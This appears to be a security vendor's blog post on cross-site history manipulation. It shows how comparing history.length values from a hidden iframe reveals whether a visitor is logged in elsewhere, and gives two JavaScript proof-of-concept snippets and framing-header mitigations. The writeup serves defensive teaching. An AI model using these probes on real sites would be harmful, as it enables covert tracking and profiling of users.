Rewriting Your History Using a Historical Vulnerability

In recent years, cross-site history manipulation (XSHM for short) has garnered rising attention from our customers. That, together with a recent CSO article exploring legacy software bugs, inspired our team to take a closer look at what has changed with XSHM. It turns out some browsers have changed in ways that, while not directly related to the vulnerability itself or its mitigation, affect both the nature of exploitation and the remediation. We'll explore all of this in this writeup.

First things first: XSHM is a Same-Origin Policy (SOP) side-channel information disclosure found and disclosed by Alex Roichman, Checkmarx's Director of Cloud-Native Security, more than 11 years ago. To this day, the issue has still not been properly addressed.

The XSHM vulnerability arises when a frameable application (i.e., one that can be embedded in an <iframe>) changes the user's browser location based on the result of a condition. Typically, that means an HTTP 302 redirect in server-side apps, or history-stack manipulation in SPAs. An attacker can craft a malicious website and use the history stack as an oracle to test whether a user is logged in to another website, if that website doesn't sufficiently protect against this type of attack. Combining this with other user 'fingerprints' such as cookies can allow tracking users.

Before we dig into the security-related topics, there are a few simple assumptions we have to make in order to understand the concepts behind this vulnerability. DISCLAIMER: These are assumptions rather than facts, because the history stack is somewhat of a grey area in terms of SOP. There are no strict rules for how history stacks should be handled, but we did include links to the relevant specifications.
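To make the vulnerable pattern concrete, here is a minimal sketch of a server-side handler with a conditional redirect. This is our illustration, not code from the original disclosure; the handler name, the `req.isAuthenticated` check, and the `/login` path are all hypothetical.

```javascript
// Minimal sketch of the pattern XSHM probes for: a page that conditionally
// 302-redirects based on a secret (the user's session state). All names
// (handleProtectedPage, req.isAuthenticated, /login) are hypothetical.
function handleProtectedPage(req, res) {
  if (!req.isAuthenticated) {
    // Unauthenticated users are bounced to the login page. This conditional
    // redirect is exactly what an attacker can observe via the history stack.
    res.statusCode = 302;
    res.setHeader("Location", "/login");
    res.end();
    return;
  }
  res.statusCode = 200;
  res.end("sensitive account page");
}
```

With Node's `http` module this handler would plug straight into `http.createServer`; the only point here is that the response depends on whether the user is logged in.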
  • Assumption #1: Browsers keep a history stack (often referred to as a "history object") for each open tab. This stack contains all the pages visited in that particular tab. You probably know this history stack pretty well already: it's exactly the one behind your browser's Back and Forward buttons.
 

Fig. 1 – The history stack and a list of history entries in Google Chrome browser

  • Assumption #2: If a website loads an <iframe> within it, every page the user visits inside the <iframe> is pushed to the history stack of the parent window (the W3C calls this a "fact" in "typical browsers"; I still prefer to call it an assumption).
  • Assumption #3: The history stack doesn't contain the same page entry twice (or more) in a row.
  • Assumption #4: Browsers enforce the SOP (Same-Origin Policy), which means that sites with different origins (i.e., differing in scheme, host, or port) should never be able to access each other's data (e.g., localStorage items, cookies and ...drum roll... the history stack length).
Well, I lied. The truth is that the history stack length is accessible even when the stack contains sites from different origins. You may wonder why we should care about the history stack length. You're in the right place, hold on.

Fig. 2 – Demo of XSHM Exploitation

The Evil Diff

The idea behind the exploitation of XSHM is to infer the result of a conditional statement from a diff between two history-stack lengths. This is the algorithm Alex suggested for finding a diff:
  1. Creating an IFrame that points to the login page in the vulnerable website (this page should be pushed to the history stack).
  2. Read the current length of the history stack (using history.length) and save it.
  3. Change the IFrame src attribute to a URL of a protected page and read the length again.
  4. From assumptions #2 and #3:
    1. If the length is the same in both cases, the user was redirected from the protected page back to the login page (i.e., not authenticated): the login page was already the top entry, so no new entry was pushed (assumption #3).
    2. However, if the length increased, the user accessed the protected page (i.e., is authenticated), and its entry was pushed to the parent's stack (assumption #2).
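A minimal sketch of these four steps in browser JavaScript might look as follows. The URLs and function names are our assumptions for illustration; the helper simply encodes the interpretation in step 4.

```javascript
// Step 4: a new history entry means the protected page actually loaded,
// so the victim is logged in to the target site.
function interpretDiff(lengthBefore, lengthAfter) {
  return lengthAfter > lengthBefore ? "authenticated" : "not authenticated";
}

// Steps 1-3, run from the attacker's page. Both URLs are hypothetical.
function probeLoginState(onResult) {
  const frame = document.createElement("iframe");
  frame.style.display = "none";
  frame.src = "https://victim.example/login";          // step 1: push the login page
  frame.onload = () => {
    const before = history.length;                     // step 2: save the current length
    frame.onload = () =>                               // fires after the second load
      onResult(interpretDiff(before, history.length)); // step 4: compare the lengths
    frame.src = "https://victim.example/account";      // step 3: point at a protected page
  };
  document.body.appendChild(frame);
}
```

Because the iframe's navigations are pushed onto the parent's stack (assumption #2) but history.length is readable cross-origin, the attacker's page never needs to read anything from the victim site itself.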
It’s also important to note that the “diff behavior” is not necessarily consistent (more on that later), because today it’s pretty common to push/replace history entries explicitly (mainly in SPAs). However, eliminating this diff completely may be a tough task for application developers who want to write secure code. This is why the diff is ‘evil’ – there is almost nothing we can do to mitigate it directly.

Finding an Up-to-Date Diff

Today, for some browsers, this may not work exactly as described above. For example, in Chromium-based browsers, assumption #3 is no longer correct, and a modification is needed:

Corrected Assumption #3: The history stack shouldn’t contain the same page entry twice (or more) in a row, unless the user was redirected to that page.

Remember when I said that the diff behavior may vary? In the previous example, we saw that if the user was authenticated, history.length increased, and if not, the length stayed the same. The following example takes advantage of the corrected assumption #3:
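The original snippet isn't reproduced here, so below is a hedged reconstruction of what such an exploit page might look like, based on the description that follows. The `changeSrc()` name and the limit of six attempts come from the writeup; the URL, element id, and everything else are our assumptions.

```javascript
// Reconstruction (not the original code): repeatedly point a hidden <iframe>
// at the restricted page and watch how much history.length grows.
const MAX_ATTEMPTS = 6;
let counter = 0;
let baseline = -1;

// Growth of at most 1: the restricted page was pushed once and never again
// (assumption #3), so the user is authenticated. Growth on every attempt:
// each load redirected to the login page, and redirects push duplicate
// entries (corrected assumption #3), so the user is not authenticated.
function interpretGrowth(growth) {
  return growth <= 1 ? "authenticated" : "not authenticated";
}

// Called from the iframe's onload handler; repeats while counter < 6.
function changeSrc() {
  const frame = document.getElementById("probe");
  if (baseline === -1) baseline = history.length; // record the starting length
  if (counter < MAX_ATTEMPTS) {
    counter++;
    frame.src = "https://victim.example/private"; // restricted page (hypothetical)
  } else {
    console.log(interpretGrowth(history.length - baseline));
  }
}
// The attacker's page would contain something like:
// <iframe id="probe" onload="changeSrc()"></iframe>
```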

Let’s break it down.

The main difference is that instead of redirecting the user only once, we redirect them several times: each time the <iframe> finishes loading, changeSrc() is called, and the process repeats as long as counter is less than 6. Each time we set the iframe's src attribute to the restricted page, the vulnerable application decides whether to serve the page or redirect the user to the login page. If the user has access to the restricted page (i.e., is authenticated), the history stack length won’t increase more than once: per assumption #3, the private page is pushed onto the stack the first time (becoming the top entry), and since no redirections occur, it isn’t pushed again. If the user is not authenticated, however, a login page entry is pushed on every attempt, because the user is redirected each time (corrected assumption #3). In this variant, then, a repeatedly growing length indicates the user is not authenticated, the inverse of the first example.

Do you see it? We found a brand new diff.

As you can see, finding a diff doesn’t necessarily mean you have to work hard. You’ll probably have to take some time to test your site with a particular browser, and once you understand how (and if) the diff “behaves,” you’ll be able to craft your own exploit. Furthermore, even if a browser doesn’t meet the assumptions we made above, that doesn’t mean it can’t be exploited.

Mitigation

Fortunately, we don’t need to eliminate the diff in order to mitigate this vulnerability. It’s enough to block the option to frame our website in an external website, which is good practice regardless of this vulnerability. The simplest way to do so is to set the response header X-Frame-Options to DENY (supported by new and old browsers) or to set the frame-ancestors directive of the CSP header to 'none' (supported in new browsers). Note that if you’re using cookies, it’s also possible to mitigate this vulnerability by setting the SameSite attribute to Lax or Strict. Though browsers should default to Lax, you must set it explicitly, because not all modern browsers follow that default (of course, this helps only if the condition’s result is based on a cookie, as in cookie-based authentication).
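As a sketch, in a Node-style handler these mitigations could be applied like this. The helper name and the session cookie value are hypothetical; the header names and values are the standard ones.

```javascript
// Apply anti-framing headers, plus an explicit SameSite attribute for
// cookie-based authentication. Function name and cookie value are made up.
function applyXshmMitigations(res) {
  // Blocks framing in old and new browsers.
  res.setHeader("X-Frame-Options", "DENY");
  // Blocks framing in modern, CSP-aware browsers.
  res.setHeader("Content-Security-Policy", "frame-ancestors 'none'");
  // Only relevant for cookie-based auth: don't rely on the Lax default.
  res.setHeader("Set-Cookie", "session=opaque-id; SameSite=Lax; Secure; HttpOnly");
}
```

Setting both framing headers is deliberate: X-Frame-Options covers legacy browsers, while frame-ancestors is the CSP-era replacement and takes precedence where both are supported.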

What About the Random-Token Sanitizer?

In the past, an acceptable mitigation was to add a randomly generated token (a string or a number) to every URL in the web application. This guarantees that every URL is unique and thus will always be pushed to the stack. Theoretically, this mitigation should be sufficient, but in practice it's very hard to maintain such a sanitizer that is spread all over the application. In addition, many fail to implement it correctly and apply the random token to only a single specific URL (which may have no impact on the ability to find a diff). Instead, we highly encourage you to block framing for the whole app. This approach is more secure, elegant, less prone to bugs, and much easier to maintain.
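For illustration only (we recommend against this approach), such a sanitizer boils down to making every URL unique, roughly like this; the function and parameter names are ours.

```javascript
// Illustrative only: append a random token so each URL is unique and is
// therefore always pushed to the history stack. The hard part is applying
// this consistently to *every* URL in an application, which is why this
// mitigation tends to fail in practice.
function withRandomToken(url) {
  const u = new URL(url);
  u.searchParams.set("xshm_token", Math.random().toString(36).slice(2));
  return u.toString();
}
```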

Final Words

This writeup introduced two main considerations. The first, for our developer readers, covers the different variants of this vulnerability as well as several mitigations. We demonstrated what general exploitation looks like (finding a diff), which makes it possible to exploit XSHM in client-side “redirections” as well, and explained why the old random-token sanitizer shouldn’t be used anymore. The second consideration is how browsers’ broken logic leaves users open to tracking, surveillance, and online profiling, which leads us to a much wider issue: long-lived and well-known vulnerabilities stay exploitable for years. This was tested and holds true for the following browsers (but isn’t limited to them):
BROWSER   VERSION
Chrome    91.0.4472.101
Firefox   89.0
Edge      91.0.864.37
IE        11.0.0.4
Note that the exploitability of XSHM depends on both the browser (vendor, version, etc.) and the web application itself; a vulnerability exists per combination of browser and web app.
